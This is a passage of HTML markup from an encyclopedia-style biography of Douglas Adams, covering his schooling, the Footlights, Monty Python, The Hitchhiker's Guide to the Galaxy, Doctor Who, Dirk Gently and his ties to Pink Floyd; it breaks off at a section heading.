1964, then the main school until December 1970. His form master, Frank Halford, said of him: \"Hundreds of boys have passed through the school but Douglas Adams really stood out from the crowd — literally. He was unnecessarily tall and in his short trousers he looked a trifle self-conscious.\" \"The form-master wouldn't say 'Meet under the clock tower,' or 'Meet under the war memorial',\" he joked, \"but 'Meet under Adams'.\"<sup id=\"cite_ref-Adams_7_5-0\" class=\"reference\"><a href=\"#cite_note-Adams_7-5\">[5]</a></sup><sup id=\"cite_ref-6\" class=\"reference\"><a href=\"#cite_note-6\">[6]</a></sup> Yet it was his ability to write first-class stories that really made him \"shine\".<sup id=\"cite_ref-Simpson_9_7-0\" class=\"reference\"><a href=\"#cite_note-Simpson_9-7\">[7]</a></sup></p>\n<p>Adams was six feet tall (1.83 m) by age 12 and stopped growing at 6 ft 5 in (1.96 m). He became the only student ever to be awarded a ten out of ten by Halford for creative writing, something he remembered for the rest of his life, particularly when facing <a href=\"/wiki/Writer%27s_block\" title=\"Writer's block\">writer's block</a>.<sup id=\"cite_ref-Adams_xix_3-1\" class=\"reference\"><a href=\"#cite_note-Adams_xix-3\">[3]</a></sup></p>\n<p>Some of his earliest writing was published at the school, such as a report on its photography club in <i>The Brentwoodian</i> in 1962, or spoof reviews in the school magazine <i>Broadsheet</i>, edited by <a href=\"/wiki/Paul_Neil_Milne_Johnstone\" class=\"mw-redirect\" title=\"Paul Neil Milne Johnstone\">Paul Neil Milne Johnstone</a>, who later became a character in <i>The Hitchhiker's Guide</i>. He also designed the cover of one issue of the <i>Broadsheet</i>, and had a letter and short story published nationally in <i><a href=\"/wiki/Eagle_(comic)\" class=\"mw-redirect\" title=\"Eagle (comic)\">The Eagle</a></i>, the boys' comic, in 1965. A poem entitled \"A Dissertation on the task of writing a poem on a candle and an account of some of the difficulties thereto pertaining\" written by Adams in January 1970, at the age of 17, was discovered by archivist Stacey Harmer in a cupboard at the school in early 2014. In it, Adams rhymes \"futile\" with \"mute, while\" and \"exhausted\" with \"of course did\".<sup id=\"cite_ref-8\" class=\"reference\"><a href=\"#cite_note-8\">[8]</a></sup> On the strength of a bravura essay on religious poetry that discussed <a href=\"/wiki/The_Beatles\" title=\"The Beatles\">the Beatles</a> and <a href=\"/wiki/William_Blake\" title=\"William Blake\">William Blake</a>, he was awarded an <a href=\"/wiki/Exhibition_(scholarship)\" title=\"Exhibition (scholarship)\">Exhibition</a> in English at <a href=\"/wiki/St_John%27s_College,_Cambridge\" title=\"St John's College, Cambridge\">St John's College, Cambridge</a>, going up in 1971. He wanted to join the <a href=\"/wiki/Footlights\" title=\"Footlights\">Footlights</a>, an invitation-only student comedy club that has acted as a hothouse for comic talent. He was not elected immediately as he had hoped, and started to write and perform in revues with Will Adams (no relation) and Martin Smith, forming a group called \"Adams-Smith-Adams\", but became a member of the Footlights by 1973.<sup id=\"cite_ref-Simpson_30-40_9-0\" class=\"reference\"><a href=\"#cite_note-Simpson_30-40-9\">[9]</a></sup> Despite doing very little work—he recalled having completed three essays in three years—he graduated in 1974 with a B.A. in <a href=\"/wiki/English_literature\" title=\"English literature\">English literature</a>.<sup id=\"cite_ref-ODNB_2-1\" class=\"reference\"><a href=\"#cite_note-ODNB-2\">[2]</a></sup></p>\n<h2><span class=\"mw-headline\" id=\"Career\">Career</span></h2>\n<h3><span class=\"mw-headline\" id=\"Writing\">Writing</span></h3>\n<p>After leaving university Adams moved back to London, determined to break into TV and radio as a writer. An edited version of the <i>Footlights Revue</i> appeared on <a href=\"/wiki/BBC_Two\" title=\"BBC Two\">BBC2</a> television in 1974. A version of the Revue performed live in London's <a href=\"/wiki/West_End_of_London\" title=\"West End of London\">West End</a> led to Adams being discovered by <a href=\"/wiki/Monty_Python\" title=\"Monty Python\">Monty Python</a>'s <a href=\"/wiki/Graham_Chapman\" title=\"Graham Chapman\">Graham Chapman</a>. The two formed a brief writing partnership, earning Adams a writing credit in <a href=\"/wiki/List_of_Monty_Python%27s_Flying_Circus_episodes#6._Party_Political_Broadcast\" title=\"List of Monty Python's Flying Circus episodes\">episode 45</a> of <i>Monty Python</i> for a sketch called \"<a href=\"/wiki/Patient_Abuse\" title=\"Patient Abuse\">Patient Abuse</a>\". He is one of only two people outside the original Python members to get a writing credit (the other being <a href=\"/wiki/Neil_Innes\" title=\"Neil Innes\">Neil Innes</a>).<sup id=\"cite_ref-times_10-0\" class=\"reference\"><a href=\"#cite_note-times-10\">[10]</a></sup> The sketch plays on the idea of mind-boggling paper work in an emergency, a joke later incorporated into the <a href=\"/wiki/Vogon\" title=\"Vogon\">Vogons</a>' obsession with paperwork. Adams also contributed to a sketch on the album for <i><a href=\"/wiki/Monty_Python_and_the_Holy_Grail\" title=\"Monty Python and the Holy Grail\">Monty Python and the Holy Grail</a></i>.</p>\n<div class=\"thumb tright\">\n<div class=\"thumbinner\" style=\"width:222px;\"><a href=\"/wiki/File:DNA_in_Monty_Python.jpg\" class=\"image\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/en/thumb/0/0a/DNA_in_Monty_Python.jpg/220px-DNA_in_Monty_Python.jpg\" width=\"220\" height=\"198\" class=\"thumbimage\" srcset=\"//upload.wikimedia.org/wikipedia/en/thumb/0/0a/DNA_in_Monty_Python.jpg/330px-DNA_in_Monty_Python.jpg 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/0/0a/DNA_in_Monty_Python.jpg/440px-DNA_in_Monty_Python.jpg 2x\" data-file-width=\"498\" data-file-height=\"448\" /></a>\n<div class=\"thumbcaption\">\n<div class=\"magnify\"><a href=\"/wiki/File:DNA_in_Monty_Python.jpg\" class=\"internal\" title=\"Enlarge\"></a></div>\nAdams in his first <i><a href=\"/wiki/Monty_Python%27s_Flying_Circus\" title=\"Monty Python's Flying Circus\">Monty Python</a></i> appearance, in full surgeon's garb</div>\n</div>\n</div>\n<p>Adams had two brief appearances in the fourth series of <i><a href=\"/wiki/Monty_Python%27s_Flying_Circus\" title=\"Monty Python's Flying Circus\">Monty Python's Flying Circus</a></i>. At the beginning of episode 42, \"The Light Entertainment War\", Adams is in a surgeon's mask (as Dr. Emile Koning, according to on-screen captions), pulling on gloves, while <a href=\"/wiki/Michael_Palin\" title=\"Michael Palin\">Michael Palin</a> narrates a sketch that introduces one person after another but never gets started. At the beginning of episode 44, \"Mr. Neutron\", Adams is dressed in a <a href=\"/wiki/List_of_recurring_Monty_Python%27s_Flying_Circus_characters#The_Pepperpots\" title=\"List of recurring Monty Python's Flying Circus characters\">pepper-pot</a> outfit and loads a missile onto a cart driven by <a href=\"/wiki/Terry_Jones\" title=\"Terry Jones\">Terry Jones</a>, who is calling for scrap metal (\"Any old iron...\"). The two episodes were broadcast in November 1974. Adams and Chapman also attempted non-Python projects, including <i><a href=\"/wiki/Out_of_the_Trees\" title=\"Out of the Trees\">Out of the Trees</a></i>.</p>\n<p>At this point Adams's career stalled; his writing style was unsuited to the then-current style of radio and TV comedy.<sup id=\"cite_ref-ODNB_2-2\" class=\"reference\"><a href=\"#cite_note-ODNB-2\">[2]</a></sup> To make ends meet he took a series of odd jobs, including as a hospital porter, barn builder, and chicken shed cleaner. He was employed as a bodyguard by a Qatari family, who had made their fortune in oil. Anecdotes about that job included that the family had once ordered one of everything from a hotel's menu, tried all the dishes, and sent out for hamburgers. Another story had to do with a prostitute sent to the floor Adams was guarding one evening. They acknowledged each other as she entered, and an hour later, when she left, she is said to have remarked, \"At least you can read while you're on the job.\"<sup id=\"cite_ref-11\" class=\"reference\"><a href=\"#cite_note-11\">[11]</a></sup></p>\n<p>During this time Adams continued to write and submit sketches, though few were accepted. In 1976 his career had a brief improvement when he wrote and performed <i>Unpleasantness at Brodie's Close</i> at the <a href=\"/wiki/Edinburgh_Fringe\" class=\"mw-redirect\" title=\"Edinburgh Fringe\">Edinburgh Fringe</a> festival. By Christmas work had dried up again, and a depressed Adams moved to live with his mother.<sup id=\"cite_ref-ODNB_2-3\" class=\"reference\"><a href=\"#cite_note-ODNB-2\">[2]</a></sup> The lack of writing work hit him hard and low confidence became a feature of Adams's life; \"I have terrible periods of lack of confidence [..] I briefly did therapy, but after a while I realised it was like a farmer complaining about the weather. You can't fix the weather – you just have to get on with it\".<sup id=\"cite_ref-Adams_prologue_12-0\" class=\"reference\"><a href=\"#cite_note-Adams_prologue-12\">[12]</a></sup></p>\n<p>Some of Adams's early radio work included sketches for <i><a href=\"/wiki/The_Burkiss_Way\" title=\"The Burkiss Way\">The Burkiss Way</a></i> in 1977 and <i><a href=\"/wiki/The_News_Huddlines\" title=\"The News Huddlines\">The News Huddlines</a></i>.<sup id=\"cite_ref-13\" class=\"reference\"><a href=\"#cite_note-13\">[13]</a></sup> He also wrote, again with Chapman, 20 February 1977 episode of <i>Doctor on the Go</i>, a sequel to the <i><a href=\"/wiki/Doctor_in_the_House_(TV_series)\" title=\"Doctor in the House (TV series)\">Doctor in the House</a></i> television comedy series. After the <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(radio_series)\" title=\"The Hitchhiker's Guide to the Galaxy (radio series)\">first radio series of <i>The Hitchhiker's Guide</i></a> became successful, Adams was made a BBC radio producer, working on <i><a href=\"/wiki/Week_Ending\" title=\"Week Ending\">Week Ending</a></i> and a pantomime called <i><a href=\"/wiki/Black_Cinderella_Two_Goes_East\" title=\"Black Cinderella Two Goes East\">Black Cinderella Two Goes East</a></i>.<sup id=\"cite_ref-14\" class=\"reference\"><a href=\"#cite_note-14\">[14]</a></sup> He left after six months to become the script editor for <i><a href=\"/wiki/Doctor_Who\" title=\"Doctor Who\">Doctor Who</a></i>.</p>\n<p>In 1979 Adams and <a href=\"/wiki/John_Lloyd_(producer)\" title=\"John Lloyd (producer)\">John Lloyd</a> wrote scripts for two half-hour episodes of <i><a href=\"/wiki/Doctor_Snuggles\" title=\"Doctor Snuggles\">Doctor Snuggles</a></i>: \"The Remarkable Fidgety River\" and \"The Great Disappearing Mystery\" (episodes seven and twelve). John Lloyd was also co-author of two episodes from the original <i>Hitchhiker</i> radio series (\"Fit the Fifth\" and \"Fit the Sixth\", also known as \"Episode Five\" and \"Episode Six\"), as well as <i><a href=\"/wiki/The_Meaning_of_Liff\" title=\"The Meaning of Liff\">The Meaning of Liff</a></i> and <i><a href=\"/wiki/The_Deeper_Meaning_of_Liff\" class=\"mw-redirect\" title=\"The Deeper Meaning of Liff\">The Deeper Meaning of Liff</a></i>.</p>\n<h4><span class=\"mw-headline\" id=\"The_Hitchhiker.27s_Guide_to_the_Galaxy\"><i>The Hitchhiker's Guide to the Galaxy</i></span></h4>\n<div role=\"note\" class=\"hatnote\">Main article: <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"The Hitchhiker's Guide to the Galaxy\">The Hitchhiker's Guide to the Galaxy</a></div>\n<p><i>The Hitchhiker's Guide to the Galaxy</i> was a concept for a science-fiction comedy radio series pitched by Adams and radio producer <a href=\"/wiki/Simon_Brett\" title=\"Simon Brett\">Simon Brett</a> to <a href=\"/wiki/BBC_Radio_4\" title=\"BBC Radio 4\">BBC Radio 4</a> in 1977. Adams came up with an outline for a pilot episode, as well as a few other stories (reprinted in <a href=\"/wiki/Neil_Gaiman\" title=\"Neil Gaiman\">Neil Gaiman</a>'s book <i><a href=\"/wiki/Don%27t_Panic:_The_Official_Hitchhiker%27s_Guide_to_the_Galaxy_Companion\" title=\"Don't Panic: The Official Hitchhiker's Guide to the Galaxy Companion\">Don't Panic: The Official Hitchhiker's Guide to the Galaxy Companion</a></i>) that could potentially be used in the series.</p>\n<div class=\"thumb tright\">\n<div class=\"thumbinner\" style=\"width:172px;\"><a href=\"/wiki/File:Towelday-Innsbruck.jpg\" class=\"image\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/1/17/Towelday-Innsbruck.jpg/170px-Towelday-Innsbruck.jpg\" width=\"170\" height=\"227\" class=\"thumbimage\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/1/17/Towelday-Innsbruck.jpg/255px-Towelday-Innsbruck.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/1/17/Towelday-Innsbruck.jpg/340px-Towelday-Innsbruck.jpg 2x\" data-file-width=\"450\" data-file-height=\"600\" /></a>\n<div class=\"thumbcaption\">\n<div class=\"magnify\"><a href=\"/wiki/File:Towelday-Innsbruck.jpg\" class=\"internal\" title=\"Enlarge\"></a></div>\n<a href=\"/wiki/Towel_Day\" title=\"Towel Day\">Towel Day</a> 2005 in Innsbruck, Austria, where Adams first had the idea of <i>The Hitchhiker's Guide</i>. In the novels a towel is the most useful thing a space traveller can have. The annual Towel Day (25 May) was first celebrated in 2001, two weeks after Adams's death.</div>\n</div>\n</div>\n<p>According to Adams, the idea for the title occurred to him while he lay drunk in a field in <a href=\"/wiki/Innsbruck\" title=\"Innsbruck\">Innsbruck</a>, Austria, gazing at the stars. He was carrying a copy of the <i><a href=\"/wiki/Hitch-hiker%27s_Guide_to_Europe\" title=\"Hitch-hiker's Guide to Europe\">Hitch-hiker's Guide to Europe</a></i>, and it occurred to him that \"somebody ought to write a <i>Hitchhiker's Guide to the Galaxy</i>\". He later said that the constant repetition of this anecdote had obliterated his memory of the actual event.<sup id=\"cite_ref-15\" class=\"reference\"><a href=\"#cite_note-15\">[15]</a></sup></p>\n<p>Despite the original outline, Adams was said to make up the stories as he wrote. He turned to <a href=\"/wiki/John_Lloyd_(producer)\" title=\"John Lloyd (producer)\">John Lloyd</a> for help with the final two episodes of <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Primary_and_Secondary_Phases#The_Primary_Phase\" title=\"The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases\">the first series</a>. Lloyd contributed bits from an unpublished science fiction book of his own, called <i>GiGax</i>.<sup id=\"cite_ref-16\" class=\"reference\"><a href=\"#cite_note-16\">[16]</a></sup> Very little of Lloyd's material survived in later adaptations of <i>Hitchhiker's</i>, such as the novels and the TV series. The TV series was based on the first six radio episodes, and sections contributed by Lloyd were largely re-written.</p>\n<p><a href=\"/wiki/BBC_Radio_4\" title=\"BBC Radio 4\">BBC Radio 4</a> broadcast the first radio series weekly in the UK in March and April 1978. The series was distributed in the United States by <a href=\"/wiki/National_Public_Radio\" class=\"mw-redirect\" title=\"National Public Radio\">National Public Radio</a>. Following the success of the first series, another episode was recorded and broadcast, which was commonly known as the Christmas Episode. <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Primary_and_Secondary_Phases#The_Secondary_Phase\" title=\"The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases\">A second series</a> of five episodes was broadcast one per night, during the week of 21–25 January 1980.</p>\n<p>While working on the radio series (and with simultaneous projects such as <i><a href=\"/wiki/The_Pirate_Planet\" title=\"The Pirate Planet\">The Pirate Planet</a></i>) Adams developed problems keeping to writing deadlines that only got worse as he published novels. Adams was never a prolific writer and usually had to be forced by others to do any writing. This included being locked in a hotel suite with his editor for three weeks to ensure that <i><a href=\"/wiki/So_Long,_and_Thanks_for_All_the_Fish\" title=\"So Long, and Thanks for All the Fish\">So Long, and Thanks for All the Fish</a></i> was completed.<sup id=\"cite_ref-17\" class=\"reference\"><a href=\"#cite_note-17\">[17]</a></sup> He was quoted as saying, \"I love deadlines. I love the whooshing noise they make as they go by.\"<sup id=\"cite_ref-Simpson_236_18-0\" class=\"reference\"><a href=\"#cite_note-Simpson_236-18\">[18]</a></sup> Despite the difficulty with deadlines, Adams wrote five novels in the series, published in 1979, 1980, 1982, 1984, and 1992.</p>\n<p>The books formed the basis for other adaptations, such as three-part comic book adaptations for each of the first three books, an interactive text-adventure <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(computer_game)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (computer game)\">computer game</a>, and a photo-illustrated edition, published in 1994. This latter edition featured a <a href=\"/wiki/42_Puzzle\" class=\"mw-redirect\" title=\"42 Puzzle\">42 Puzzle</a> designed by Adams, which was later incorporated into paperback covers of the first four <i>Hitchhiker's</i> novels (the paperback for the fifth re-used the artwork from the hardback edition).<sup id=\"cite_ref-19\" class=\"reference\"><a href=\"#cite_note-19\">[19]</a></sup></p>\n<p>In 1980 Adams also began attempts to turn the first <i>Hitchhiker's</i> novel into a movie, making several trips to Los Angeles, and working with a number of Hollywood studios and potential producers. The next year, the radio series became the basis for a BBC television mini-series<sup id=\"cite_ref-20\" class=\"reference\"><a href=\"#cite_note-20\">[20]</a></sup> broadcast in six parts. When he died in 2001 in California, he had been trying again to get the movie project started with <a href=\"/wiki/Disney\" class=\"mw-redirect\" title=\"Disney\">Disney</a>, which had bought the rights in 1998. The screenplay finally got a posthumous re-write by <a href=\"/wiki/Karey_Kirkpatrick\" title=\"Karey Kirkpatrick\">Karey Kirkpatrick</a>, and <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(film)\" title=\"The Hitchhiker's Guide to the Galaxy (film)\">the resulting film</a> was released in 2005.</p>\n<p>Radio producer <a href=\"/wiki/Dirk_Maggs\" title=\"Dirk Maggs\">Dirk Maggs</a> had consulted with Adams, first in 1993, and later in 1997 and 2000 about creating a third radio series, based on the third novel in the <i>Hitchhiker's</i> series.<sup id=\"cite_ref-21\" class=\"reference\"><a href=\"#cite_note-21\">[21]</a></sup> They also discussed the possibilities of radio adaptations of the final two novels in the five-book \"trilogy\". As with the movie, this project was only realised after Adams's death. The third series, <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Tertiary_to_Quintessential_Phases#The_Tertiary_Phase\" title=\"The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases\">The Tertiary Phase</a></i>, was broadcast on <a href=\"/wiki/BBC_Radio_4\" title=\"BBC Radio 4\">BBC Radio 4</a> in September 2004 and was subsequently released on audio CD. With the aid of a recording of his reading of <i>Life, the Universe and Everything</i> and editing, Adams can be heard playing the part of Agrajag posthumously. <i>So Long, and Thanks for All the Fish</i> and <i>Mostly Harmless</i> made up the fourth and fifth radio series, respectively (on radio they were titled <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Tertiary_to_Quintessential_Phases#The_Quandary_Phase\" title=\"The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases\">The Quandary Phase</a></i> and <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Tertiary_to_Quintessential_Phases#The_Quintessential_Phase\" title=\"The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases\">The Quintessential Phase</a></i>) and these were broadcast in May and June 2005, and also subsequently released on Audio CD. The last episode in the last series (with a new, \"more upbeat\" ending) concluded with, \"The very final episode of <i>The Hitchhiker's Guide to the Galaxy</i> by Douglas Adams is affectionately dedicated to its author.\"<sup id=\"cite_ref-22\" class=\"reference\"><a href=\"#cite_note-22\">[22]</a></sup></p>\n<h4><span class=\"mw-headline\" id=\"Dirk_Gently_series\"><i>Dirk Gently</i> series</span></h4>\n<div class=\"thumb tright\">\n<div class=\"thumbinner\" style=\"width:222px;\"><a href=\"/wiki/File:Douglas_Adams_San_Francisco.jpg\" class=\"image\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/e/ee/Douglas_Adams_San_Francisco.jpg/220px-Douglas_Adams_San_Francisco.jpg\" width=\"220\" height=\"165\" class=\"thumbimage\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/e/ee/Douglas_Adams_San_Francisco.jpg/330px-Douglas_Adams_San_Francisco.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/e/ee/Douglas_Adams_San_Francisco.jpg/440px-Douglas_Adams_San_Francisco.jpg 2x\" data-file-width=\"1024\" data-file-height=\"768\" /></a>\n<div class=\"thumbcaption\">\n<div class=\"magnify\"><a href=\"/wiki/File:Douglas_Adams_San_Francisco.jpg\" class=\"internal\" title=\"Enlarge\"></a></div>\nAdams in March 2000</div>\n</div>\n</div>\n<p>In between Adams's first trip to Madagascar with <a href=\"/wiki/Mark_Carwardine\" title=\"Mark Carwardine\">Mark Carwardine</a> in 1985, and their series of travels that formed the basis for the radio series and non-fiction book <i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i>, Adams wrote two other novels with a new cast of characters. <i><a href=\"/wiki/Dirk_Gently%27s_Holistic_Detective_Agency\" title=\"Dirk Gently's Holistic Detective Agency\">Dirk Gently's Holistic Detective Agency</a></i> was first published in 1987, and was described by its author as \"a kind of ghost-horror-detective-time-travel-romantic-comedy-epic, mainly concerned with mud, music and quantum mechanics\".<sup id=\"cite_ref-23\" class=\"reference\"><a href=\"#cite_note-23\">[23]</a></sup> It was derived from two Doctor Who serials Adams had written.</p>\n<p>A sequel novel, <i><a href=\"/wiki/The_Long_Dark_Tea-Time_of_the_Soul\" title=\"The Long Dark Tea-Time of the Soul\">The Long Dark Tea-Time of the Soul</a></i>, was published a year later. This was an entirely original work, Adams's first since <i>So Long, and Thanks for All the Fish.</i> After the book tour, Adams set off on his round-the-world excursion which supplied him with the material for <i>Last Chance to See</i>.</p>\n<h4><span class=\"mw-headline\" id=\"Doctor_Who\"><i>Doctor Who</i></span></h4>\n<div role=\"note\" class=\"hatnote\">Main article: <a href=\"/wiki/Doctor_Who\" title=\"Doctor Who\">Doctor Who</a></div>\n<p>Adams sent the script for the <i>HHGG</i> pilot radio programme to the <i>Doctor Who</i> production office in 1978, and was commissioned to write <i><a href=\"/wiki/The_Pirate_Planet\" title=\"The Pirate Planet\">The Pirate Planet</a></i> (see below). He had also previously attempted to submit a potential movie script, called \"Doctor Who and the Krikkitmen\", which later became his novel <i>Life, the Universe and Everything</i> (which in turn became the third <i>Hitchhiker's Guide</i> radio series). Adams then went on to serve as script editor on the show for its seventeenth season in 1979. Altogether, he wrote three <a href=\"/wiki/List_of_Doctor_Who_serials\" title=\"List of Doctor Who serials\"><i>Doctor Who</i> serials</a> starring <a href=\"/wiki/Tom_Baker\" title=\"Tom Baker\">Tom Baker</a> as <a href=\"/wiki/The_Doctor_(Doctor_Who)\" title=\"The Doctor (Doctor Who)\">the Doctor</a>:</p>\n<ul>\n<li>\"<a href=\"/wiki/The_Pirate_Planet\" title=\"The Pirate Planet\">The Pirate Planet</a>\" (the second serial in the \"<a href=\"/wiki/The_Key_to_Time\" class=\"mw-redirect\" title=\"The Key to Time\">Key to Time</a>\" arc, in <a href=\"/wiki/Doctor_Who_(season_16)\" class=\"mw-redirect\" title=\"Doctor Who (season 16)\">season 16</a>)</li>\n<li>\"<a href=\"/wiki/City_of_Death\" title=\"City of Death\">City of Death</a>\" (with producer <a href=\"/wiki/Graham_Williams_(television_producer)\" title=\"Graham Williams (television producer)\">Graham Williams</a>, from an original storyline by writer <a href=\"/wiki/David_Fisher_(writer)\" title=\"David Fisher (writer)\">David Fisher</a>. It was transmitted under the pseudonym \"<a href=\"/wiki/David_Agnew\" title=\"David Agnew\">David Agnew</a>\")</li>\n<li>\"<a href=\"/wiki/Shada\" class=\"mw-redirect\" title=\"Shada\">Shada</a>\" (only partially filmed; not televised due to <a href=\"/wiki/Strike_action\" title=\"Strike action\">industry disputes</a>)</li>\n</ul>\n<p>The episodes authored by Adams are some of the few that were not novelised as Adams would not allow anyone else to write them, and asked for a higher price than the publishers were willing to pay.<sup id=\"cite_ref-24\" class=\"reference\"><a href=\"#cite_note-24\">[24]</a></sup> \"Shada\" was later adapted as a novel by <a href=\"/wiki/Gareth_Roberts_(writer)\" title=\"Gareth Roberts (writer)\">Gareth Roberts</a> in 2012 and \"City of Death\" by <a href=\"/wiki/James_Goss_(producer)\" title=\"James Goss (producer)\">James Goss</a> in 2015.</p>\n<p>Adams was also known to allow in-jokes from <i>The Hitchhiker's Guide</i> to appear in the <i>Doctor Who</i> stories he wrote and other stories on which he served as Script Editor. Subsequent writers have also inserted <i>Hitchhiker's</i> references, even <a href=\"/wiki/The_Rings_of_Akhaten\" title=\"The Rings of Akhaten\">as recently as 2013</a>. Conversely, at least one reference to <i>Doctor Who</i> was worked into a <i>Hitchhiker's</i> novel. In <i><a href=\"/wiki/Life,_the_Universe_and_Everything\" title=\"Life, the Universe and Everything\">Life, the Universe and Everything</a></i>, two characters travel in time and land on the pitch at <a href=\"/wiki/Lord%27s_Cricket_Ground\" class=\"mw-redirect\" title=\"Lord's Cricket Ground\">Lord's Cricket Ground</a>. The reaction of the radio commentators to their sudden appearance is very similar to the reactions of commentators in a scene in the eighth episode of the 1965–66-story <i><a href=\"/wiki/The_Daleks%27_Master_Plan\" title=\"The Daleks' Master Plan\">The Daleks' Master Plan</a></i>, which has the Doctor's <a href=\"/wiki/TARDIS\" title=\"TARDIS\">TARDIS</a> <a href=\"/wiki/Materialization_(science_fiction)\" class=\"mw-redirect\" title=\"Materialization (science fiction)\">materialise</a> on the pitch at Lord's.</p>\n<p>Elements of <i>Shada</i> and <i>City of Death</i> were reused in Adams's later novel <i><a href=\"/wiki/Dirk_Gently%27s_Holistic_Detective_Agency\" title=\"Dirk Gently's Holistic Detective Agency\">Dirk Gently's Holistic Detective Agency</a></i>, in particular the character of <a href=\"/wiki/Professor_Chronotis\" title=\"Professor Chronotis\">Professor Chronotis</a>. <a href=\"/wiki/Big_Finish_Productions\" title=\"Big Finish Productions\">Big Finish Productions</a> eventually remade <i>Shada</i> as an audio play starring <a href=\"/wiki/Paul_McGann\" title=\"Paul McGann\">Paul McGann</a> as the Doctor. Accompanied by partially animated illustrations, it was <a href=\"/wiki/Doctor_Who_spin-offs#Webcasts\" title=\"Doctor Who spin-offs\">webcast</a> on the <a href=\"/wiki/BBC_Online\" title=\"BBC Online\">BBC website</a> in 2003, and subsequently released as a two-CD set later that year. An omnibus edition of this version was broadcast on the digital radio station <a href=\"/wiki/BBC7\" class=\"mw-redirect\" title=\"BBC7\">BBC7</a> on 10 December 2005.</p>\n<p>In the <i>Doctor Who</i> 2012 Christmas episode <i><a href=\"/wiki/The_Snowmen#Production\" title=\"The Snowmen\">The Snowmen</a></i>, writer <a href=\"/wiki/Steven_Moffat\" title=\"Steven Moffat\">Steven Moffat</a> was inspired by a storyline that Adams pitched called <i>The Doctor Retires</i>.<sup id=\"cite_ref-25\" class=\"reference\"><a href=\"#cite_note-25\">[25]</a></sup></p>\n<p>While he was at school,<sup class=\"noprint Inline-Template\" style=\"white-space:nowrap;\">[<i><a href=\"/wiki/Wikipedia:Avoid_weasel_words\" class=\"mw-redirect\" title=\"Wikipedia:Avoid weasel words\"><span title=\"The material near this tag possibly uses too vague attribution or weasel words. (October 2015)\">which?</span></a></i>]</sup> he wrote and performed a play called <i>Doctor Which</i>.<sup id=\"cite_ref-Adams_xx_26-0\" class=\"reference\"><a href=\"#cite_note-Adams_xx-26\">[26]</a></sup></p>\n<h3><span class=\"mw-headline\" id=\"Music\">Music</span></h3>\n<p>Adams played the guitar left-handed and had a collection of twenty-four left-handed guitars when he died (having received his first guitar in 1964). He also studied piano in the 1960s with the same teacher as <a href=\"/wiki/Paul_Wickens\" title=\"Paul Wickens\">Paul Wickens</a>, the pianist who plays in <a href=\"/wiki/Paul_McCartney\" title=\"Paul McCartney\">Paul McCartney</a>'s band (and composed the music for the 2004–2005 editions of the <i>Hitchhiker's Guide</i> radio series).<sup id=\"cite_ref-27\" class=\"reference\"><a href=\"#cite_note-27\">[27]</a></sup> <a href=\"/wiki/Pink_Floyd\" title=\"Pink Floyd\">Pink Floyd</a> and <a href=\"/wiki/Procol_Harum\" title=\"Procol Harum\">Procol Harum</a> had important influence on Adams's work.</p>\n<h4><span class=\"mw-headline\" id=\"Pink_Floyd\">Pink Floyd</span></h4>\n<p>Adams included a reference to <a href=\"/wiki/Pink_Floyd\" title=\"Pink Floyd\">Pink Floyd</a> in the original radio version of <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"The Hitchhiker's Guide to the Galaxy\">The Hitchhiker's Guide to the Galaxy</a></i>, in which he describes the main characters surveying the landscape of an alien planet while Marvin, their android companion, hums Pink Floyd's \"<a href=\"/wiki/Shine_on_You_Crazy_Diamond\" class=\"mw-redirect\" title=\"Shine on You Crazy Diamond\">Shine on You Crazy Diamond</a>\" (Part 1). This was cut out of the CD version. Adams also compared the various noises that the <a href=\"/wiki/Kakapo\" title=\"Kakapo\">kakapo</a> makes to \"Pink Floyd studio out-takes\" in his non-fiction book on endangered species, <i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i>.</p>\n<p>Adams's official biography shares its name with the song \"<a href=\"/wiki/Wish_You_Were_Here_(1975_song)\" class=\"mw-redirect\" title=\"Wish You Were Here (1975 song)\">Wish You Were Here</a>\" by Pink Floyd. Adams was friends with Pink Floyd guitarist <a href=\"/wiki/David_Gilmour\" title=\"David Gilmour\">David Gilmour</a> and, on Adams's 42nd birthday, he was invited to make a guest appearance at Pink Floyd's concert of 28 October 1994 at Earls Court in London, playing guitar on the songs \"<a href=\"/wiki/Brain_Damage_(song)\" title=\"Brain Damage (song)\">Brain Damage</a>\" and \"<a href=\"/wiki/Eclipse_(song)\" title=\"Eclipse (song)\">Eclipse</a>\".<sup id=\"cite_ref-Mabbett-MM_28-0\" class=\"reference\"><a href=\"#cite_note-Mabbett-MM-28\">[28]</a></sup> Adams chose the name for Pink Floyd's 1994 album, <i><a href=\"/wiki/The_Division_Bell\" title=\"The Division Bell\">The Division Bell</a></i>, by picking the words from the lyrics to one of its tracks, \"High Hopes\".<sup id=\"cite_ref-Mabbett-MM_28-1\" class=\"reference\"><a href=\"#cite_note-Mabbett-MM-28\">[28]</a></sup> Gilmour also performed at Adams's memorial service in 2001, and what would have been Adams's 60th birthday party in 2012.</p>\n<h4><span class=\"mw-headline\" id=\"Procol_Harum\">Procol 